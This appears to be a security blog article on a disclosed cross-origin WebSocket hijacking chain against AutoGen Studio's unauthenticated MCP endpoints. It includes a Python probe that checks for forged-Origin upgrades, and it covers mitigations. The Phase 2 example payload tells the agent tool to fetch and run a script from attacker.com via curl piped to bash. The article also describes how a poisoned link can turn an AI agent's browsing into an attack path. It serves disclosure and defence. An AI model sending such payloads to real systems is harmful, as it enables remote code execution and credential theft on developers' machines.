Microsoft Discloses 'AutoJack' AI Agent RCE Chain Targeting AutoGen Studio
By Vatsal Shah · June 19, 2026 · Cyber Security · Source: Microsoft Security Response Center
AI SUMMARY
- Microsoft Security researchers publicly disclosed 'AutoJack' on June 18, 2026, a critical exploit chain resulting in Remote Code Execution (RCE) on developer machines.
- The vulnerability targets pre-release builds of AutoGen Studio that expose unauthenticated WebSocket endpoints under the /api/mcp/* path.
- By leveraging cross-origin WebSocket hijacking (CSWSH), a malicious website can send commands to the local AutoGen service, bypassing the implicit trust the server placed in connections arriving on localhost.
- The exploit allows an attacker to hijack the agent's web browsing actions and execute arbitrary shell commands with the privileges of the local developer.
- Microsoft and the AutoGen team have released an upstream main branch patch enforcing WebSocket token authentication and restricting cross-origin requests.
What Happened
On June 18, 2026, Microsoft Security Response Center (MSRC) published a warning detailing 'AutoJack', a multi-stage exploit chain that allows remote attackers to execute arbitrary code on developer workstations. The vector exploits a vulnerability in the local development server of AutoGen Studio, the low-code front end for AutoGen, Microsoft's popular multi-agent orchestration framework.
The vulnerability stems from the way AutoGen Studio handles local connections. Because developers run AutoGen Studio locally (typically bound to localhost:8081 or similar), the service assumed that any connection arriving on the loopback interface was trusted. Microsoft researchers demonstrated that this trust can be abused from outside the machine. If a developer running AutoGen Studio visits a malicious website, or an agent's browser follows a poisoned link, the attacker's page can run client-side script in the background. That script opens a WebSocket to the local AutoGen server. The connection genuinely originates from the loopback interface, because the developer's own browser makes it, and WebSocket handshakes are not subject to CORS, so nothing stops the request unless the server itself inspects the Origin header.

Once connected, the exploit uses the unauthenticated Model Context Protocol (MCP) endpoints. By sending crafted JSON-RPC payloads over the WebSocket interface at /api/mcp/*, the attacker can make the AutoGen orchestration engine run system commands disguised as agent tool calls, fully compromising the developer's system. The AutoGen team has committed a hotfix to the main branch that enforces authorization tokens and strict origin controls.
Technical Analysis of the Exploit Chain
The AutoJack vulnerability highlights a major security challenge in the design of agentic tools: the assumption of local network safety. The exploit utilizes three distinct phases to transition from a browser tab to local system execution.
Phase 1: Bypassing Localhost Trust Bounds
Browsers enforce the same-origin policy on ordinary HTTP requests: a script on an external site (e.g., attacker.com) cannot read responses from a local address (e.g., 127.0.0.1:8081) unless the server opts in through Cross-Origin Resource Sharing (CORS) headers, and the CORS preflight blocks most non-simple requests outright. WebSocket handshakes are not covered by CORS at all. The browser opens the connection to any origin, attaches an Origin header naming the page that asked for it, and leaves the decision entirely to the server.
This is Cross-Site WebSocket Hijacking (CSWSH, often written cross-origin WebSocket hijacking): a script on attacker.com requests a WebSocket upgrade to ws://127.0.0.1:8081/api/mcp/chat, and because the AutoGen server did not check the Origin header of incoming upgrade requests, it accepted the connection from the malicious origin and treated it like a request from its own UI.
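The check a practitioner wants here is a probe that replays exactly what a browser sends for `new WebSocket(url)`, with a foreign Origin, and reports whether the listener hands back 101 Switching Protocols. The block below is an added example, not code from the MSRC advisory or the AutoGen project. The host, port, path and origin value are illustrative assumptions, and the two stub listeners are constructed here so the probe runs offline against both a vulnerable (Origin ignored) and a hardened (exact-match Origin) server.

```python
"""Probe a loopback WebSocket endpoint for cross-origin upgrade acceptance (CSWSH).

Added example, not from the advisory or the AutoGen project. Host, port, path and
origin are assumptions; the stub servers are constructed for offline use.
"""
import base64
import hashlib
import os
import socket
import threading

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # RFC 6455 handshake constant


def build_upgrade(host: str, port: int, path: str, origin: str) -> bytes:
    """Assemble the HTTP/1.1 upgrade request a browser would emit, Origin included."""
    key = base64.b64encode(os.urandom(16)).decode()
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}:{port}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
        f"Origin: {origin}",  # browsers always attach this; only the server can act on it
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def _read_head(sock: socket.socket) -> bytes:
    """Read until the end of the HTTP header block."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def probe(host: str, port: int, path: str, origin: str, timeout: float = 3.0) -> dict:
    """Send the forged-Origin handshake and report the status code and whether it was accepted."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_upgrade(host, port, path, origin))
        head = _read_head(s)
    status_line = head.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = status_line.split(" ", 2)
    code = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return {"status": code, "accepted": code == 101}


# Constructed stub listeners: the vulnerable one accepts any Origin (the pattern the
# advisory describes); the hardened one allows only an exact-match local origin.
LOCAL_ORIGINS = {"http://127.0.0.1:8081", "http://localhost:8081"}  # assumed UI origins


def start_stub(check_origin: bool) -> int:
    """Bind a loopback listener on a free port, serve handshakes in a thread, return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn: socket.socket) -> None:
        with conn:
            head = _read_head(conn).decode(errors="replace")
            headers = {}
            for line in head.split("\r\n")[1:]:
                if ":" in line:
                    k, v = line.split(":", 1)
                    headers[k.strip().lower()] = v.strip()
            if check_origin and headers.get("origin", "") not in LOCAL_ORIGINS:
                conn.sendall(b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n")
                return
            accept = base64.b64encode(
                hashlib.sha1((headers.get("sec-websocket-key", "") + WS_GUID).encode()).digest()
            ).decode()
            conn.sendall(
                (f"HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
                 f"Connection: Upgrade\r\nSec-WebSocket-Accept: {accept}\r\n\r\n").encode()
            )

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for label, port in (("vulnerable", start_stub(False)), ("hardened", start_stub(True))):
        r = probe("127.0.0.1", port, "/api/mcp/chat", "https://attacker.example")
        print(f"{label:10} -> HTTP {r['status']}  cross-origin upgrade accepted: {r['accepted']}")
```

Point `probe()` at a real local service (for example port 8081 and the /api/mcp/chat path named in the advisory) with an Origin you do not control; a 101 means any page the developer visits can open that socket. A 403, 401 or closed connection means the server is at least looking at the handshake, though only the token check (next section) stops a client that spoofs a local Origin outside a browser.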
Phase 2: The MCP WebSocket Authentication Flaw
The Model Context Protocol (MCP) allows agents to connect to local servers that expose tools, resources, and prompts. In pre-release builds of AutoGen Studio, these MCP interfaces were unauthenticated.
Once the WebSocket connection is established, the attacker sends an MCP JSON-RPC message. Depending on what the build exposes, this either registers a custom shell-execution tool or invokes an existing one such as execute_command; the message below takes the second route and asks the server to run an arbitrary command:
{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": {
      "command": "curl -s http://attacker.com/payload | bash"
    }
  },
  "id": 1
}
Phase 3: System Execution
Because the AutoGen Studio server runs with the developer's own user permissions, the command executes locally on the workstation, giving the attacker everything that account can reach: environment variables, SSH keys, source repositories, and cached cloud credentials.

Mitigations and Upstream Patches
Upon receiving the report from Microsoft researchers, the AutoGen maintainers worked quickly to release patches. Developers running AutoGen Studio should upgrade to the latest stable release immediately.
Enforcing Strict Authentication Tokens
The hotfix changes the WebSocket startup logic to require a cryptographically random token. Each time AutoGen Studio launches, it generates a fresh token and writes it to a local configuration file. All client requests, including WebSocket upgrades, must present this token in the query string:
ws://127.0.0.1:8081/api/mcp/chat?token=ab89c892e8fa...
Connections lacking a valid token are rejected before the upgrade completes. This defeats cross-origin attempts because a page on another origin cannot read the developer's local token file. Two caveats apply to any such scheme: the token must be compared in constant time, and a query-string token ends up in access logs and browser history, so the token file should be user-readable only and rotated on every launch.
Restricting the Origin Header
The WebSocket server now validates the Origin header. It only permits connections whose origin exactly matches the configured host (typically localhost or 127.0.0.1 on the configured port) and rejects external domains with 403 Forbidden. Exact matching matters: a prefix or substring test on "localhost" would still admit an origin such as localhost.attacker.com.
Implementing Agent Browsing Isolation Gates
To prevent agents from visiting malicious sites that trigger these local vectors, organizations are encouraged to route agent web browsing through an isolated browsing gateway. The agent's browser then runs in a separate sandbox (a VM or container), so any script a page executes sees the sandbox's loopback interface rather than the developer's.

Why It Matters
The Risk of Agentic Tooling Sprawl
The AutoJack disclosure highlights a growing risk in enterprise AI deployments: the security debt associated with local developer tools. As organizations rush to adopt frameworks like AutoGen and LangGraph, developers are running unauthenticated API services on their local machines, expanding the corporate attack surface.
This trend is part of a broader rise in security vulnerabilities, as detailed in our coverage of AI Agent Security Incidents (88% Rise) and the updated OWASP Agentic AI Security Governance 2.0 guidelines.
Bypassing Localhost Assumptions
Many developer tools treat localhost as a safe zone, assuming that only local users can access it. AutoJack shows that this assumption is flawed. Any local service that does not validate origins, enforce authentication, or restrict WebSocket upgrades can be exploited remotely via browser-based vectors.
To help security teams audit and mitigate these risks, we have built a comprehensive governance framework in our playbook on Surviving Shadow AI & Architecting Enterprise Governance.
What to Watch Next
- Broadening Security Audits: Security researchers are auditing other popular agent frameworks (including CrewAI, Semantic Kernel, and LangChain templates) for similar cross-origin WebSocket weaknesses.
- Enterprise Restrictions on Local Servers: Expect corporate security teams to block unauthenticated local loopback servers on developer workstations, mandating centralized, audited developer environments.
- Model Context Protocol (MCP) Evolution: The MCP working group is drafting standard security models to enforce token authentication and encrypted connections across all host-client interactions.
Source
Microsoft Security Response Center — AutoJack Exploitation Report (Jun 18, 2026)
Additional references: Cloud Security Alliance AI Safety Initiative
Related on shahvatsal.com:
- OWASP Agentic AI Security Governance 2.0
- AI Agent Security Incidents Up 88% in Production
- Handling Agentic Memory and State Failure in Production
- Surviving Shadow AI: Architecting Enterprise Governance